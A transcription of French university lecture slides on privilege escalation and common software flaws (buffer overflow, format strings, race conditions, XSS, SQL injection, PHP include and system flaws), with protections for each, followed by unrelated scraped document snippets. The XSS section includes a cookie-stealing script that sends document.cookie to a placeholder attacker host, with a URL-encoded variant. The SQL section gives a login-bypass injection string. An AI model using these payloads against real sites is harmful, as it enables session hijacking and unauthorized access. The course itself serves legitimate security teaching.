Sécurité des systèmes informatiques Escalade des privilèges

Dimension: px
Commencer à balayer dès la page:

Download "Sécurité des systèmes informatiques Escalade des privilèges"

Transcription

1 Année Sécurité des systèmes informatiques Escalade des privilèges Nicolas Baudru mél : nicolas.baudru@esil.univmed.fr page web : nicolas.baudru.esil.perso.univmed.fr 1

2 Mise en garde Ce cours a uniquement pour but de vous montrer comment une mauvaise implémentation d un programme peut le rendre vulnérable à une attaque. Nous déclinons toute responsabilité quant à la mauvaise utilisation de ce cours. L utilisation des différentes attaques décrites dans ce cours peut être sanctionnée jusqu à trois ans de prison et soixante quinze mille euros d amende. 2

3 Sécuriser les systèmes informatiques Introduction La sécurité des ordinateurs consiste à développer des solutions pour : préserver l intégrité d un système ; garantir la disponibilité d un système ou d un service ; maintenir la confidentialité des données Autrement dit, il faut pouvoir faire face aux attaques suivantes : intrusion ; déni de service ; escalade des privilèges. 3

4 Introduction La base de la sécurité : la division des privilèges Aucun système ne peut être parfaitement sûr car ses utilisateurs ne le sont pas. il est nécessaire de protéger chaque utilisateur des autres, ce qui conduit au principe de division des privilèges. La division des privilèges nécessite : une protection logicielle entre les utilisateurs : identification (qui ils sont) et authentification (il faut le prouver). une protection matérielle au niveau du noyau : l architecture de l ordinateur doit rendre possible la division des privilèges en séparant l espace mémoire du noyau de l espace mémoire des utilisateurs (appels systèmes nécessaires pour effectuer des actions sensibles). 4

5 Vulnérabilités applicatives Introduction De nombreuses applications sont vulnérables à cause d une mauvaise programmation, souvent involontaire (négligeance, manque de temps,...), et parfois intentionnelles. Toutes les applications peuvent être touchées! Les solutions contre ces vulnérabilités sont souvent simples à mettre en oeuvre : utilisation de fonctions sécurisées validation des chaînes de caractères récupérées en entrée techniques d échappement des caractères spéciaux activation de certaines protections systèmes etc. La détection de ces failles est cependant assez difficile et nécessite souvent un audit approfondi et des tests de sécurité. 5

6 Plan Introduction 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 6

7 Plan Vulnérabilité des mots de passe 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 7

8 Nom d'utilisateur et mot de passe Vulnérabilité des mots de passe Sur les systèmes modernes multi-utilisateurs, il est nécessaire de s authentifier pour accéder à l OS. Pour cela on utilise généralement une paire <login mot de passe> Un mot de passe est une succession arbitraire de lettres et de chiffres de longueur finie (généralement 6 à 8 caractères) authentifiant un utilisateur. Les mots de passe sont encodés et placés dans des fichiers à accès limité. Le codage utilisé peut être réversible ou non. Les méthodes les plus utilisées sont DES (Data Encryption Standard) et MD5. Remarque : l authentification peut être obtenue par d autres mécanismes tels que les systèmes à cartes à puce (souvent couplés avec un mot de passe) ou la biométrie. 8

9 Vulnérabilité des mots de passe Stockage du mot de passe dans le modèle UNIX login = UID Un UID est un nombre entier non signé sur 16 bits (en général). A chaque UID est associé un mot de passe utilisateur. Le triplet <nom d utilisateur / UID / mot de passe> était traditionnellement enregistré dans le fichier /etc/passwd : ce fichier est lisible par tous ; les mots de passe y sont encodés (généralement par la méthode DES) ; les mots de passe sont vulnérables aux attaques par dictionnaire. Maintenant, les mots de passe sont enregistrés dans /etc/shadow : le fichier /etc/passwd ne contient plus les mots de passe ; le fichier /etc/shadow est lisible par le root uniquement ; ce dernier fichier permet des schémas d expiration et le remplacement automatique des mots de passe est possible. L authentification s effectue en comparant le mot de passe encodé donné par l utilisateur à celui du fichier /etc/passwd (ou shadow). 9

10 Vulnérabilité des mots de passe Le principe du cryptage dans le modèle UNIX char* crypt(const char *key, const char *setting) ; La chaîne key (le mot de passe) est utilisée pour chiffrer suivant l algorithme DES un bloc de 64 bits tous mis à 0. Le tableau de caractères setting, lorsqu il ne comprend que deux caractères (seulement 12 bits sont utilisés réellement), est appelé salt (sel) et permet d introduire du désordre à l algorithme DES. deux mots de passe identiques seront codés différemment. Le résultat de cette fonction est une chaîne de 64 bits (provenant de 25 codages successifs) stockée sous la forme de 11 caractères imprimables. Deux caractères suplémentaires (provenant du sel) sont placés devant les 11 caractères. Le tout (les 13 caractères) constitue le mot de passe codé stocké dans le fichier /etc/passwd. 10

11 Les attaques des mots de passe Vulnérabilité des mots de passe Attaque par dictionnaire : un programme tente de deviner le mot de passe d un utilisateur en se basant sur ses informations personnelles (nom/prénom, login) et des mots des dictionnaires qu on lui fournit. Se protéger des attaques par dictionnaire : Enregistrer les mots de passe dans le fichier shadow plutôt que passwd. Le choix du mot de passe est important. Il faut éviter : les mots du dictionnaire ; les mots ayant un rapport avec l utilisateur (nom du chien par exemple) ; les suites de lettres formant une combinaison simple sur le clavier (une partie d une ligne) ; etc. Un bon mot de passe doit pouvoir être mémorisé par l utilisateur. Pour une sécurité optimale, le mot de passe doit être changé suffisamment souvent. 11

12 Les attaques des mots de passe Vulnérabilité des mots de passe Attaque par renifleurs : lors d une connexion à distance en utilisant rlogin ou telnet, il est possible d intercepter le login et le mot de passe en clair. (voir aussi la partie sur la vulnérabilité des réseaux) Se protéger des renifleurs : Utiliser des sessions sécurisées type ssh ou Kerberos. Utiliser des mots de passe jetables (one time passwords) choisis parmi une liste de mots de passe obtenus via une carte à cristaux liquides etc 12

13 Plan Buffer overflow 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 13

14 Présentation Buffer overflow Le dépassement de tampon (ou de pile, ou de tas) est une technique ancienne, bien connue, et encore très utilisée exploitant une faille du programme pour en prendre le contrôle. Elle consiste à faire déborder un tampon sur la pile afin d injecter (et exécuter) du code malveillant. Pour que cette faille aparaîsse, il suffit que le programmeur stocke ses données dans un tableau sans en vérifier la longueur. L exemple suivant est décrit en détaille dans l article intitulé Dépassement de pile sous Linux x86 disponible sur le site 14

15 Dépassement de tableau Buffer overflow Exemple : Se programme peut provoquer à l exécution un segmentation fault. Pourquoi? À quel moment de l exécution exactement? pour répondre précisément à ces questions il faut bien comprendre le fonctionnement de la pile. 15

16 Rappel : fonctionnement de la pile (1) Buffer overflow 16

17 Rappel : fonctionnement de la pile (2) Buffer overflow 17

18 Rappel : fonctionnement de la pile (3) Buffer overflow 18

19 Rappel : fonctionnement de la pile (4) Buffer overflow 19

20 Rappel : fonctionnement de la pile (5) Buffer overflow 20

21 Exploiter la faille Buffer overflow Revenons à notre buffer. Celui-ci occupe dans la pile 10 octets. Si la chaîne de caractères lue est trop longue, elle va dépasser du tableau, et peut aller jusqu à écraser l adresse de retour : c est ce qui provoque le segmentation fault. C est ici qu est la faille. En effet en choisissant bien l entrée, on peut écraser l adresse de retour par une autre adresse valide pointant sur une case du buffer. Remarque : on peut facilement déterminer l adresse où est stockée l adresse de retour de la fonction en utilisant un debugger. 21

22 Exploiter la faille (suite) Buffer overflow L écrasement de l adresse de retour va être utilisé pour provoquer l exécution du shell /bin/sh commun à toutes les distributions Unix et Linux. En C, il faudrait utiliser l instruction : execve(argv[0],/bin/sh,null). Puisque cette instruction doit être placée directement dans la pile, on va générer du code assembleur de cette instruction, par exemple : On peut vérifier que ce shellcode est correct : 22

23 Exploiter la faille (n) Buffer overflow Il ne reste alors qu à injecter le shellcode dans l appplication : 23

24 Buffer overflow Se protéger des dépassement de tableaux Au niveau de l application : toujours vérifier la longueur des données reçues utiliser les fonctions avec contrôle de longueur : gets(str) fgets(stdin, str, 10) scanf(%s, str) scanf(%10s, str) Au niveau du compilateur : changer l emplacement du buffer à chaque démarage du programme. placer un canary devant chaque adresse de retour. Au niveau de l OS : la pile peut être rendue non exécutable. Exemple : patch PaX pour Linux ; dans Solaris, ajout dans /etc/system des lignes : set noexec_user_stack=1 set noexec_user_stack_log=1 Remarque : Il est possible de contourner plusieurs de ces protections en utilisant la technique du return-to-libc. 24

25 Plan Format string 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 25

26 Chaînes de format Format string En C, les chaînes de format sont des chaînes de caractères contenant des spécificateurs reconnus par les fonctions de type printf(). Elles permettent de formater l affichage des arguments passés à la fonction. Exemple : 26

27 Quelques spécicateurs de format Format string Exemple : spécificateur résultat passé par %d nombre entier valeur %f floatant valeur %x naturel en hexadécimal valeur %c caractère valeur %s chaîne de caractères référence %n nombre de caractères écrits jusqu à présent référence 27

28 direction de la pile Format string Fonctionnement des chaînes de format (1) Contenu de la pile après l exécution du printf() dans le cas normal : variables locales de la fonction d'appel (ici main()). Contient les variables nb x... direction des adresses pointeur vers la variable nb (utilisé par %n) pointeur vers la variable x (utilisé par %s) pointeur vers la chaîne de format arguments de la fonction printf() adresse de retour de la fonction printf() 28

29 Format string Fonctionnement des chaînes de format (2) Que se passe-t-il si on oublie de passer un argument à printf()? Exemple : 29

30 direction de la pile Format string Fonctionnement des chaînes de format (3) Que se passe-t-il si on oublie de passer un argument à printf()? Explication : contenu de la pile après l exécution du premier printf() : direction des adresses variables locales de la fonction d'appel (ici main()). Contient entre autres la variable x. argument utilisé par défaut par le spécificateur %s. Contient 0x?? pointeur vers la chaîne de format adresse de retour de la fonction printf() arguments de la fonction printf() 30

31 Format string Fonctionnement des chaînes de format (4) Oublier des arguments dans printf() peut provoquer des erreurs à l exécution! Exemple : 31

32 direction de la pile Format string Fonctionnement des chaînes de format (5) Oublier des arguments dans printf() peut provoquer des erreurs à l exécution! Explication : Contenu de la pile après l exécution du deuxième printf() : variables locales de la fonction d'appel (ici main()). Contient entre autres les variables x et nb. direction des adresses argument utilisé par défaut par le spécificateur %n. Contient 0x?? pointeur vers la variable x pointeur vers la chaîne de format arguments de la fonction printf() Case mémoire 0x?? non accessible au processus => erreur adresse de retour de la fonction printf() 32

33 direction de la pile Format string La faille On peut utiliser la fonction printf() et son spécificateur %n pour modifier la valeur d une variable locale de la fonction main(). variables locales du main() variables locales du main() direction des adresses... nb... &nb nb... &nb utilisé par %n arguments utilisés par un nombre assez grand de spécificateurs %x pointeur vers la chaîne de format adresse de retour de printf() arguments de la fonction printf() -- ETAPE 1 -- mettre dans la pile l'adresse de la variable nb -- ETAPE 2 -- appeler la fonction printf() avec une chaîne de format "assez longue" du type %x %x... %x %n 33

34 Exploiter la faille Format string 34

35 Mise en oeuvre Format string Essayons maintenant de cracker un petit programme aussi simple qu inutile ;) On veut de nouveau modifier la valeur de nb... mais sans toucher au code. 35

36 direction de la pile Mise en oeuvre Etape 1 Format string On examine le contenu de la pile après l exécution du premier printf() : variables locales du main() direction des adresses f[0-3] = AAAA = 0x nb = 7 = 0x x8fe34eb3 0 0xbffffc4a pointeur vers la chaîne de format adresse de retour de printf() 36

37 Mise en oeuvre Etape 2 Format string On place dans la pile l adresse de nb en lieu et place de AAAA : Remarques : 1. La commande shell echo -e '\xbf\x\xf1\x6c' Les apostrophes inverses ( ) Attention à l architecture little endian 4. L adresse de la variable nb a changé à cause de la longueur de la chaîne de caractères f. 37

38 Mise en oeuvre Etape 2 (suite) Format string On place dans la pile l adresse de nb en lieu et place de AAAA : Remarques : 1. Le spécificateur %8$x permet d afficher directement le 8ième argument 2. On a mis à jour l entrée en tenant compte de la nouvelle adresse et de l architecture little endian. 3. Le 8ième argument est bien l adresse de nb. 38

39 direction de la pile Mise en oeuvre Etape 2 (n) Format string On est donc maintenant dans la situation suivante : variables locales du main() direction des adresses f[0-3] = 0xbffff14c nb = 7 = 0x7?????????????????? pointeur vers la chaîne de format adresse de retour de printf() Donc si l on remplace dans la ligne de commande précédente le spécificateur %8$x par le spécificateur %8$n, le nombre de caractères écrits jusqu à présent sera enregistré dans la variable stockée à l adresse décrite par le 8ième argument, soit nb. 39

40 Mise en oeuvre Etape 3 Format string Au final, il faut entrer la commande suivante : On sait maintenant modifier aléatoirement le contenu de la variable nb. Comment choisir le nombre affecté à cette variable? 40

41 Format string Comment entrer un grand nombre? Méthode 1 En utilisant plus de caractères dans l argument de la ligne de commande : Remarques : L ajout de caractères peut modifier l endroit où est stockée la variable nb. Cette méthode est limitée par la taille du tableau f[2560]. 41

42 Format string Comment entrer un grand nombre? Méthode 2 En utilisant les spécificateurs : par exemple, %13x provoque l affichage de 13 caractères. Remarques : L ajout de caractères peut modifier l endroit où est stockée la variable nb. Méthode pas très subtile. 42

43 Format string Comment entrer un grand nombre? Méthode 3 En utilisant la façon dont sont stockés les entiers en mémoire. 43

44 direction de la pile Format string Comment entrer un grand nombre? Méthode 3 (suite) direction des adresses 0Xbffffbac 0Xbffffba8 variables locales du main() f nb 0Xbffffbab 0Xbffffbaa 0Xbffffba9 0Xbffffba8 f a4 bc 7f 44

45 Format string Comment entrer un grand nombre? Méthode 3 (encore) 0Xbffffbab 0Xbffffbaa 0Xbffffba9 entier nb à l'adresse 0Xbffffba8 variables locales du main() variable f f a4 bc 7f f bc a f entier à entier à l'adresse entier à l'adresse 0Xbffffbab entier à l'adresse 0Xbffffbaa l'adresse 0Xbffffba9 0Xbffffba8 45

46 Format string Comment entrer un grand nombre? Méthode 3 (toujours) variables locales du main() variable f 0Xbffffbac variable nb 0Xbffffba8 0Xbffffbab 0Xbffffbaa 0Xbffffba9 0Xbffffba8 pointeur vers la chaîne de format adresse de retour de printf f bc a f entier à entier à l'adresse entier à l'adresse 0Xbffffbab entier à l'adresse 0Xbffffbaa l'adresse 0Xbffffba9 0Xbffffba8 46

47 Format string Comment entrer un grand nombre? Méthode 3 (n) Au final nous obtenons la ligne de commande suivante : Remarque : L ajout de caractères a modifié l endroit où est stockée la variable nb. 47

48 Format string Comment se servir de ce type de vulnérabilité Exemple : Fonctionnement normal du programme PILE (...) GOT (...) pointeur vers fonction_lib (...) (...) variable ch (...) LA BIBLIOTHÈQUE (...) fonction_lib() (...) Autre_fonction() (...) PROGRAMME (...) printf(ch); (...) fonction_lib(ch); (...) Fonctionnement du programme après crackage PILE (...) GOT (...) pointeur vers Autre_fonction (...) (...) variable ch contenant notre chaîne de format (...) On peut modifier la valeur du pointeur vers fonction_lib de manière à pointer vers une autre fonction système qui nous intéresse. 48

49 Se protéger Format string Au niveau de l application : attention aux erreurs qui permettent de transmettre une chaîne de format quelques outils existent pour se protéger contre ce type de vulnérabilité : pscan, Flawfinder, RATS, ITS4,... + protections similaires à celles utilisées pour le buffer overflow. 49

50 Plan Race condition 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 50

51 Présentation Race condition Faille peu exploitée mais redoutable. Elle consiste à détourner l utilisation d une application setuid pour permettre à un utilisateur Unix de s élever les droits d un fichier. Cette faille utilise : les droits spéciaux tels que setuid, getuid et sticky bit ; les liens symboliques ; le plus souvent les fichiers créés dans le repertoire /temp ; l accès concurrent à ces fichiers par des processus appartenant à des utilisateurs distincts. Cette faille devient redoutable lorsque le lien pointe vers un fichier système critique (du style /etc/shadow) et que l application est setuid root. 51

52 Race condition Droits spéciaux : setuid, getuid et sticky bit Pour les fichiers : setuid : utiliser l ID du propriétaire du fichier lors de l exécution ; getuid : utiliser l ID du groupe propriétaire du fichier lors de l exécution ; sticky bit : conserver le code du programme sur le périphérique de swap après exécution. Pour les répertoires : sticky bit : indique que seuls le propriétaire du répertoire et le propriétaire d un fichier qui s y trouve ont le droit de supprimer ce fichier. 52

53 Race condition Comment s'éléver les droits sur un chier? Exemple : À l exécution : 53

54 Race condition Comment s'éléver les droits sur un chier? (suite) Un premier test... 54

55 Race condition Comment s'éléver les droits sur un chier? (n) Pour exploiter la faille il suffit d utiliser les liens symboliques... Remarque : dans le cas d un fichier temporaire, l application doit être tuée avant qu elle n efface ce fichier. 55

56 Race condition Première étape pour améliorer la sécurité Ne pas utiliser de noms de fichiers temporaires faciles à deviner ; Vérifier si le fichier à créer existe déjà, ou la présence d un lien vers ce fichier : Mais cela ne suffit pas! 56

57 Race condition Race condition Processus RCListing2 : processus P : préemption de RCListing2 activation de P création du lien chier_temp.txt vers chier_perso.txt activation de RCListing2 préemption de P 57

58 Augmenter la sécurité Race condition En plus des mesures précédentes : créer un sous-répertoire dans le répertoire /temp avec un accès limité, et utiliser des noms de fichiers temporaires arbitraires (voir la fonction C mkstemp (3)) placés à l intérieur de ce répertoire. 58

59 Plan XSS 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 59

60 Présentation XSS Cross-Site Scripting (XSS ou CSS) : attaque consistant à forcer un site web à afficher du code HTML ou des scripts saisis par les utilisateurs. Cette attaque touche les sites webs affichant dynamiquement du contenu utilisateur sans effectuer de contrôle des informations saisies par les utilisateurs. Le code est injecté via l URL. Risques : il est possible d afficher du code HTML supplémentaire et malicieux dans une page web vulnérable afin de changer son aspect, modifier son contenu (ajouter des liens vers des sites malveillants) modifier son comportement (récupérer des cookies et des données confidentielles). 60

61 Comment exploiter cette faille XSS La plupart des navigateurs modernes interprètent des scripts contenus dans les pages web tels que JavaScript, VBScript, ActiveX ou Flash par l intermédiaire des balises HTML suivantes : <SCRIPT> <OBJECT> <APPLET> <EMBED>. Conséquence : il est possible d injecter du code arbitraire dans la page web, afin que celui-ci soit exécuté sur le poste de l utilisateur. si le navigateur de l utilisateur est configuré pour exécuter de tels scripts, alors le code malicieux a accès à l ensemble des données partagées par la page web de l utilisateur et le serveur (cookies, champs de formulaires, etc.). 61

62 Comment exploiter cette faille (suite) XSS Exemple : Le message est transmis via l URL : http :// word 62

63 Comment exploiter cette faille (n) XSS Exemple : <SCRIPT> document.location='http ://site.pirate/volecookie.php?cookie='+document.cookie </SCRIPT> Le code ci-dessus récupère les cookies de l utilisateur et les transmet au pirate : http :// ='http ://site.pirate/volecookie.php?cookie='+document.cookie</script> encodage de l URL pour masquer l attaque : http :// %64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e... 63

64 Deux types de failles XSS XSS Faille non permanente : apparaît lorsque les données fournies par un utilisateur sont directement utilisées par le serveur pour fournir une page de résultat personnalisée au client ; l attaque reste locale ; l attaque doit être couplée avec des techniques d ingénierie sociale (social engineering) pour être effective. Faille permanente : apparaît lorsque les données entrées par un utilisateur sont stockées sur un serveur, puis réaffichées (ex : blog, forums, etc) ; Cette attaque est très puissante puisqu elle touche un grand nombre de personnes simultanément sans avoir recours à l ingénierie sociale. 64

65 Exemple XSS 1. Un utilisateur malfaisant envoie un courriel à la victime qui contient un script javascript 2. La victime se connecte à l application webmail en entrant son code utilisateur et mot de passe via SSL 3. Le serveur envoie un cookie au client contenant un identificateur unique de session. 4. L utilisateur lit le message malfaisant qui est affiché tel quel 5. Le javascript s exécute, récupère le cookie contenant la session, et redirige le client vers un serveur malfaisant en envoyant à celui-ci la session en paramètre 6. Le serveur malfaisant reçoit la session de la victime et redirige le client vers la page précédente 7. L utilisateur malfaisant peut maintenant accéder au compte webmail et effectuer un vol d identité 65

66 Protection contre le XSS XSS Chez l utilisateur : Désactiver l exécution des langages de scripts. (Très contraignant mais efficace). Au niveau du site web : Cacher les variables dans l URL en utilisant des techniques d URL rewriting ; Vérifier le format des données entrées par les utilisateurs ; Encoder les données utilisateurs affichées en échappant les caractères spéciaux (utilisation des fonctions htmlentities() ou htmlspecialchars() en PHP). 66

67 Plan Injection SQL 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 67

68 Présentation Injection SQL Faille touchant les sites Webs interagissant de manière non sécurisée avec une base de données. Son principe est de détourner les requêtes SQL pour obtenir par exemple : un accès à des pages ou des données confidentielles ; créer des fichiers sur le serveur ; obtenir des informations sur le serveur ou les bases de données. 68

69 Injections SQL (suite) Injection SQL Exemple : Où est la faille? 69

70 Injections SQL (n) Injection SQL La faille : Imaginons que nous rentrons pour $_POST["login"] ceci : Alors la requête SQL devient : a' OR 'a'='a'# Sécuriser la faille : utiliser l URL rewriting ; utiliser la fonction mysql_real_escape_string(), fournie par l API, pour échapper les caractères ; ne pas oublier de mettre des même autour des nombres. 70

71 Plan Faille include() 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 71

72 Présentation Faille include() C est une faille PHP très connue due à une erreur de programmation, qui exploite les fonctions du type include(), require(),... Ces fonctions permettent d inclure un fichier et d exécuter son contenu. Exemple : où l URL ressemble à index.php?page=lm.php 72

73 Exploiter la faille Faille include() La faille : la fonction include() ne vérifie pas si la page existe localement. Cela permet de créer des backdoors pour, par exemple : lire le source de la page lister les dossiers du sites, placer des chevaux de Troie pour récupérer un login\pass et même afficher des fichiers normalement protégés comme.htpasswd, /etc/shadow (si le serveur fonctionne en root, on peut toujours réver ;),... 73

74 Se protéger Faille include() Sécuriser la faille : toujours vérifier si les pages à inclure sont bien sur le serveur ; encore mieux : créer un tableau répertoriant les pages que l on peut inclure. 74

75 Plan Faille system() 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 75

76 Présentation Faille system() La fonction system() de Linux permet d exécuter une commande passée en argument. Cette commande est recherchée à l aide des variables d environnement PATH et IFS. Sur certaines versions Linux, cela crée une vulnérabilité dès lors que le programme appelant la fonction system() est Set-UID. 76

77 Exploiter la faille Faille system() Rappels : La variable PATH contient une liste de répertoires où rechercher un programme séparés par :. PATH=/bin :/usr/bin :/home/bob La variable IFS contient le caractère de séparation des arguments d un programme. La faille : Si la fonction system() fait appel à un programme /bin/prog1 alors il suffit de créer un programme bin dans notre répertoire courant, placer le répertoire courant au début de la variable PATH, modifier la variable IFS pour que le séparateur d arguments soit /. 77

78 Se protéger Faille system() Il est très facile de sécuriser cette faille : Utiliser une version de Linux où cette faille de sécurité a été corrigée Ne pas utiliser system() mais plutôt les fonctions du type exec(). 78

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement

Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement Guillaume HARRY l Contenu sous licence Creative Commons CC-BY-NC-ND Principales failles de sécurité des applications Web Principes, parades et bonnes pratiques de développement P. 2 1. Introduction 2.

Plus en détail

Vulnérabilités et sécurisation des applications Web

Vulnérabilités et sécurisation des applications Web OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning

Plus en détail

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin Sécurité des sites Web Pas un cours un recueil du net INF340 Jean-François Berdjugin Vulnérabilité Définition (wikipédia) : Dans le domaine de la sécurité informatique, une vulnérabilité est une faiblesse

Plus en détail

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4) Sommaire : Contenu I. Introduction:... 2 II. Présentation de l atelier :... 2 1) Attaque persistante :... 3 2) Attaque non persistante :...

Plus en détail

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward

PHP CLÉS EN MAIN. 76 scripts efficaces pour enrichir vos sites web. par William Steinmetz et Brian Ward PHP CLÉS EN MAIN 76 scripts efficaces pour enrichir vos sites web par William Steinmetz et Brian Ward TABLE DES MATIÈRES INTRODUCTION 1 1 TOUT CE QUE VOUS AVEZ TOUJOURS VOULU SAVOIR SUR LES SCRIPTS PHP

Plus en détail

Attaques applicatives

Attaques applicatives Attaques applicatives Attaques applicatives Exploitation d une mauvaise programmation des applications Ne touche pas le serveur lui-même mais son utilisation/ configuration Surtout populaire pour les sites

Plus en détail

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI

OWASP Open Web Application Security Project. Jean-Marc Robert Génie logiciel et des TI OWASP Open Web Application Security Project Jean-Marc Robert Génie logiciel et des TI A1: Injection Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est

Plus en détail

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet Expérience d un hébergeur public dans la sécurisation des sites Web, CCK Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet Plan Introduction Sécurisation des sites Web hébergés a Conclusion Introduction

Plus en détail

Vulnérabilités et solutions de sécurisation des applications Web

Vulnérabilités et solutions de sécurisation des applications Web Vulnérabilités et solutions de sécurisation des applications Web Patrick CHAMBET EdelWeb ON-X Consulting patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Eric Larcher RSSI Accor

Plus en détail

Systèmes d exploitation

Systèmes d exploitation Systèmes d exploitation Virtualisation, Sécurité et Gestion des périphériques Gérard Padiou Département Informatique et Mathématiques appliquées ENSEEIHT Novembre 2009 Gérard Padiou Systèmes d exploitation

Plus en détail

Introduction aux buffer overflow, CS335

Introduction aux buffer overflow, CS335 Introduction aux buffer overflow, CS335 http ://www.phrack.org/archives/49/p49-14 1. Smashing the stack for fun and profit by Aleph One November 1996 Aleph1 United Kingdom : www.aleph1.co.uk Mail : aleph1@securityfocus.com

Plus en détail

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON

Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,

Plus en détail

Protection des protocoles www.ofppt.info

Protection des protocoles www.ofppt.info ROYAUME DU MAROC Office de la Formation Professionnelle et de la Promotion du Travail Protection des protocoles DIRECTION RECHERCHE ET INGENIERIE DE FORMATION SECTEUR NTIC Sommaire 1. Introduction... 2

Plus en détail

The Mozilla Art Of War. David Teller. 20 septembre 2008. Laboratoire d Informatique Fondamentale d Orléans. La sécurité des extensions.

The Mozilla Art Of War. David Teller. 20 septembre 2008. Laboratoire d Informatique Fondamentale d Orléans. La sécurité des extensions. The Mozilla Art Of War Laboratoire d Informatique Fondamentale d Orléans 20 septembre 2008 Firefox, c est sûr Firefox, c est sûr Donc je vais faire mes extensions sous Firefox, elles seront en sécurité.

Plus en détail

Informatique. Les réponses doivent être données en cochant les cases sur la dernière feuille du sujet, intitulée feuille de réponse

Informatique. Les réponses doivent être données en cochant les cases sur la dernière feuille du sujet, intitulée feuille de réponse Questions - Révision- - 1 er Semestre Informatique Durée de l examen : 1h pour 40 questions. Aucun document n est autorisé. L usage d appareils électroniques est interdit. Les questions faisant apparaître

Plus en détail

La mémorisation des mots de passe dans les navigateurs web modernes

La mémorisation des mots de passe dans les navigateurs web modernes 1 La mémorisation des mots de passe dans les navigateurs web modernes Didier Chassignol Frédéric Giquel 6 décembre 2005 - Congrès JRES 2 La problématique Multiplication des applications web nécessitant

Plus en détail

Disque Dur Internet «Découverte» Guide d utilisation du service

Disque Dur Internet «Découverte» Guide d utilisation du service Disque Dur Internet «Découverte» Guide d utilisation du service janvier 05 Disque Dur Internet - Guide d utilisation du service 1 SOMMAIRE 1 A QUOI SERT LE SERVICE DE STOKAGE COLLABORATIF?... 3 1.1 L accès

Plus en détail

Création d un «Web Worm»

Création d un «Web Worm» Création d un «Web Worm» Exploitation automatisée des failles web Simon Marechal Thales Security Systems Consultant Risk Management 1 Création d un ver exploitant une faille web 1.1 Introduction Les applications

Plus en détail

Les formations. ENI Ecole Informatique

Les formations. ENI Ecole Informatique Titre professionnel : Inscrit au RNCP de niveau I (Bac) (J.O. du 14 avril 2012) 17 semaines page 1/7 Unité 1 : Spécifier, concevoir et réaliser une application n-tiers 7 semaines Module 1 : Algorithme

Plus en détail

DenyAll Detect. Documentation technique 27/07/2015

DenyAll Detect. Documentation technique 27/07/2015 DenyAll Detect Documentation technique 27/07/2015 Sommaire 1. A propos de ce document... 3 1.1 Objet... 3 1.2 Historique... 3 1.3 Contexte... 3 2. Liste des tests... 4 2.1 Découverte réseau (scan de ports)...

Plus en détail

Groupe Eyrolles, 2006, ISBN : 2-212-11933-X

Groupe Eyrolles, 2006, ISBN : 2-212-11933-X Groupe Eyrolles, 2006, ISBN : 2-212-11933-X Table des matières Introduction... V CHAPITRE 1 Introduction à SSL VPN... 1 Une histoire d Internet.............................................. 3 Le modèle

Plus en détail

Architectures web/bases de données

Architectures web/bases de données Architectures web/bases de données I - Page web simple : HTML statique Le code HTML est le langage de base pour concevoir des pages destinées à être publiées sur le réseau Internet ou intranet. Ce n'est

Plus en détail

Rappels Entrées -Sorties

Rappels Entrées -Sorties Fonctions printf et scanf Syntaxe: écriture, organisation Comportement Données hétérogènes? Gestion des erreurs des utilisateurs 17/11/2013 Cours du Langage C ibr_guelzim@yahoo.fr ibrahimguelzim.atspace.co.uk

Plus en détail

INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez

INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez INF8420 Éléments de sécurité informatique Hiver 2008 TRAVAIL PRATIQUE 2 Prof. : José M. Fernandez Directives : - La date de remise est Mercredi le 26 mars 2007 à 12h, *VOIR I STRUCTIO S DÉTAILLÉES DE REMISE

Plus en détail

INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau)

